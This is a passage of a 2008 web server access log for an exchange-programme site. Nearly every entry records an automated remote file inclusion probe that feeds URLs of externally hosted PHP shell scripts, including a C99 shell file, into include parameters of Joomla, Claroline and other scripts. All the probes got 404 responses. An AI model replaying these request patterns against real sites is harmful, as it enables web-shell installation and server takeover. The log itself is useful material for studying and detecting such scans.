116.125.113.115 - - [16/Mar/2008:19:51:27 -0700] "GET //skin/zero_vote/error.php?dir=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:51:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:51:35 -0700] "GET /logs/access_071126.log//skin/zero_vote/error.php?dir=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:51:35 -0700] "GET /logs/access_071126.log//skin/zero_vote/error.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:51:35 -0700] "GET //skin/zero_vote/error.php?dir=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:51:35 -0700] "GET //skin/zero_vote/error.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:51:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:51:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.36.235.74 - - [16/Mar/2008:19:52:03 -0700] "GET /logs/access_080127.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
216.130.191.252 - - [16/Mar/2008:19:52:55 -0700] "GET /logs/access_080107.log//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.130.191.252 - - [16/Mar/2008:19:52:55 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.130.191.252 - - [16/Mar/2008:19:52:55 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:53:58 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:53:59 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:53:59 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:19:54:01 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.55.150.108 - - [16/Mar/2008:19:54:39 -0700] "GET /logs/access_080211.log/index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.55.150.108 - - [16/Mar/2008:19:54:39 -0700] "GET /logs/index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.230.87.84 - - [16/Mar/2008:19:55:10 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.codeduc.cl/modules/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.toulouseangloexchange.com"
87.230.87.84 - - [16/Mar/2008:19:55:11 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?i